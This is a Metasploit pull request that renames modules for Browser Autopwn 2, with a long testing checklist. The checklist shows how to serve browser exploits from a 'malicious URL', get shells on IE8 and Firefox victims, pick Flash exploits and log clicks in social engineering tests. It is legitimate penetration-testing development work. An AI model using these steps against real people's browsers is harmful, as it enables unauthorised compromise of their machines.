### PR TITLE
Add Browser Autopwn 2

### DIFF
--- a/lib/msf/core/exploit/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/browser_autopwn2.rb
@@ -1,6 +1,6 @@
 ###
 #
-# The Msf::Exploit::Remote::BrowserAutopwnv2 mixin is a replacement for the current BrowserAutoPwn.
+# The Msf::Exploit::Remote::BrowserAutopwn2 mixin is a replacement for the current BrowserAutoPwn.
 # It works with other components such as BrowserExploitServer, BrowserProfileManager, and BES-based
 # exploits to perform a faster and smarter automated client-side attack.
 #
@@ -9,7 +9,7 @@
 require 'date'
 
 module Msf
-  module Exploit::Remote::BrowserAutopwnv2
+  module Exploit::Remote::BrowserAutopwn2
 
     include Msf::Exploit::Remote::BrowserExploitServer
 

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -104,4 +104,4 @@ require 'msf/core/exploit/android'
 
 # Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'
-require 'msf/core/exploit/browser_autopwnv2'
+require 'msf/core/exploit/browser_autopwn2'

--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
-  include Msf::Exploit::Remote::BrowserAutopwnv2
+  include Msf::Exploit::Remote::BrowserAutopwn2
 
   def initialize(info={})
     super(update_info(info,

--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -8,9 +8,9 @@ run_single("set MaxSessionCount 0")
 
 # Instead of set Content, you can also do set Custom404 to redirect the client to an SE training website
 # For example (why don't you try this? :-) )
-# run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
+run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
 
-run_single("set HTMLContent \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
+# run_single("set HTMLContent \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
 
 run_single("run")
 </ruby>

--- a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb
@@ -1,6 +1,6 @@
 require 'msf/core'
 
-describe Msf::Exploit::Remote::BrowserAutopwnv2 do
+describe Msf::Exploit::Remote::BrowserAutopwn2 do
 
 
 


### PR DESCRIPTION
# If you'd like to see the latest progress of this pull request, please just scroll all the way to the bottom :-)

This pull request is for the new Browser Autopwn v2.

First off, please make sure to set up:
- [x] Windows XP SP3
- [x] This XP should have IE8
- [x] Firefox 27: http://fs12.filehippo.com/9401/ab6c3b4687e94a3995d2197ba39c63a6/Firefox%20Setup%2027.0.exe
- [x] The testing also involves trying out Flash exploits. So you will need this page: https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html

And please follow these testing steps:
## Being able to run Browser Autopwn
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `run`
- [x] In about 10 seconds or less, BAP should be ready. It should show you a list of exploits it wants to use, and say something like this:

```
[*] Please use the following URL for the browser attack:
[*] BrowserAutoPwn URL: http://192.168.1.64:8080/VQXwCRR
```
## Being able to stop jobs properly
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `run`
- [x] Do: `jobs -K`
- [x] Do: `jobs`
- [x] You should see that all jobs are stopped
- [x] In a new terminal, do `netstat -antp tcp |grep 8080`, and you should see that this port is not open (this is the default web server port for BAP)

And do this:
- [x] Start Browser Autopwn again
- [x] Do: `jobs`
- [x] Find the job ID for auxiliary/server/browser_autopwn2. Let's say it's 0 in this case.
- [x] Do: `jobs -k 0`
- [x] Do: `jobs`
- [x] You should see all jobs are stopped (browser autopwn and its child exploits)
- [x] In a new terminal, do `netstat -antp tcp |grep 8080`, and you should see that this port is not open (this is the default web server port for BAP)
## Being able to get a session from BAP
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `run`
- [x] Visit the malicious BAP URL to your IE8/Win XP
- [x] You should get a shell.
## Browser profiles collected by BAP should not interfere with the standalone one.

Since you already goto a shell agains the XP machine, we assume it was MS14-064 because that's currently the first one on the list.
- [x] Do `jobs -K` for BAP
- [x] Start msfconsole in a new terminal
- [x] Do: `exploit/windows/browser/ms14_064_ole_code_execution`
- [x] Do: `run`
- [x] You should see these two steps:

```
[*] 192.168.1.80     ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.1.80     ms14_064_ole_code_execution - Sending HTML response.
```
## The INCLUDE_PATTERN option should only give you specific exploits
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set INCLUDE_PATTERN adobe_flash`
- [x] Do: `run`
- [x] You should see that only Adobe Flash exploits are loaded.
## The EXCLUDE_PATTERN option should ignore the exploits you don't want.
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set EXCLUDE_PATTERN adobe_flash`
- [x] Do: `run`
- [x] You should see that no Adobe Flash exploits are on the list.
## Test the MaxExploitCount option
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set MaxExploitCount 10`
- [x] Do: `run`
- [x] Only 10 exploits are loaded
## Test the MaxSessionCount option
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set MaxSessionCount 0`
- [x] Do: `run`
- [x] Visit the malicious link with your IE8 XP box
- [x] IE should get a 404
## Test the ShowExploitList option
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set ShowExploitList true`
- [x] Do: `run`
- [x] Visit the malicious link with your IE8 XP box
- [x] BAP should tell you which exploit or exploits are suitable for this IE8 box, for example:

```
[*] 192.168.1.80     autopwn - Exploits found suitable for 192.168.1.80 (Tag: WRaIymsotzcMAK)


 Order  IP            Exploit
 -----  --            -------
 1      192.168.1.80  ms14_064_ole_code_execution
```
## Test the AllowedAddresses option
- [x] In a terminal, do: `echo 192.168.1.123 > /tmp/ip.txt`. And make sure this IP isn't your XP SP3's IP.
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set AllowedAddresses file://tmp/ip.txt`
- [x] Do: `run`
- [x] Visit the malicious URL w/ IE8
- [x] IE8 should get a 404, and BAP should say:

```
[*] 192.168.1.80     autopwn - Client is trying to connect but not on our whitelist.
```
## Test the HTMLContent option
- [ ] Save the following HTML file as /tmp/test.html

``` html
<htm>
<head>
</head>
<body>
<h2>You have been hacked!</h2>
</body>
</html>
```
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set HTMLContent file://tmp/test.html`
- [ ] Do: `set MaxSessionCount 0`
- [x] Do: `run`
- [x] Visit the malicious URL with IE8
- [x] On IE8, it should say "You have been hacked!"
- [ ] You should not receive a session.
## Setting up an internal social engineering test (dry-run)
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set Custom404 https://www.youtube.com/watch?v=O_ufD3QT51U`
- [x] Do: `set ShowExploitList true`
- [x] Do: `set MaxSessionCount 0`
- [x] Do: `run`
- [x] On your OSX, visit the malicious URL with Chrome
- [x] BAP will probably say `User 192.168.1.64 (Tag: eubShlrZDzxgmUfsNovgRP) visited our malicious link, but no exploits found suitable.` (because we don't have any exploits for that setup)
- [x] Chrome should play the Youtube video
- [x] Do: `notes -t bap.clicks`
- [x] You should see all the IPs that have visited BAP
## Test Flash exploits
- [x] Please test one of these Flash exploits:

```
adobe_flash_nellymoser_bof
adobe_flash_shader_job_overflow
adobe_flash_shader_drawing_fill
adobe_flash_net_connection_confusion
adobe_flash_worker_byte_array_uaf
adobe_flash_casi32_int_overflow
adobe_flash_copy_pixels_to_byte_array
adobe_flash_uncompress_zlib_uaf
adobe_flash_pixel_bender_bof
adobe_flash_domain_memory_uaf
```

If the exploit is multi-platform, it will probably default to the Windows target. And that means if there's a Linux target trying the exploit, BAP will probably say incompatible payload, and serves a 404 to the client. This is expected. It's a limitation with Framework's design.
## Firefox Testing

Firefox exploits are tricky for BAP because Firefox payloads don't have Firefox payload handlers. Instead, they use generic handlers. For example, if an exploit is using firefox/shell_reverse_tcp, it's actually using generic/shell_reverse_tcp as the handler.
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/browser_autopwn2`
- [x] Do: `set INCLUDE_PATTERN firefox_webidl_injection`
- [x] Do: `run`
- [x] Try the malicious link with Firefox 27
- [x] You should get a shell
## Resource script testing

Resource scripts are meant to be used to make Browser Autopwn easier to use in msfconsole.

**Resource script for testing IE only**
- [x] Do: `./msfconsole -q -r scripts/resource/bap_ie_only.rc`
- [x] You should see only IE exploits are loaded (the BrowserExploitServer ones)

**Resource script for testing Firefox only**
- [x] Do: `./msfconsole -q -r scripts/resource/bap_firefox_only.rc`
- [x] You should see only Firefox exploits are loaded (the BrowserExploitServer ones)

**Resource script for testing Adobe Flash only**
- [x] Do: `./msfconsole -q -r scripts/resource/bap_flash_only.rc`
- [x] You should see only Flash exploits are loaded (the BrowserExploitServer ones)

**Resource script for dry-run only**
- [x] Do: `./msfconsole -q -r scripts/resource/bap_dryrun_only.rc`
- [x] Visit the link with a browser. On the browser, you should see this message: `Hello, this is a security test. You shouldn't have clicked on that link :-)`
